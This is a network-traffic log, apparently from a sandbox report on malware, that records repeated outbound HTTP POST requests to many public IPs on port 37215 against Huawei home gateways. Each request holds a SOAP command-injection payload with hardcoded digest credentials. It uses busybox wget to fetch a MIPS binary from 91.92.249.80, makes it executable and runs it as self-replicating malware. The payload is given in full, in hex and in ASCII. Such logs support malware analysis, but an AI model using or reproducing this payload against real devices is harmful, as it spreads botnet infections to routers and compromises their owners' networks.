                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          993192.168.2.2344414157.71.77.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269864082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          994192.168.2.2355404197.226.10.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269876957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          995192.168.2.2358276197.214.115.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269877911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          996192.168.2.2360834157.197.227.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269897938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          997192.168.2.233489669.187.89.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270263910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          998192.168.2.236047841.51.68.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270271063 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          999192.168.2.2356726157.230.67.12437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270288944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1000192.168.2.234928441.14.58.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270294905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1001192.168.2.2347092157.160.11.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270312071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1002192.168.2.2355782197.235.61.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270328999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
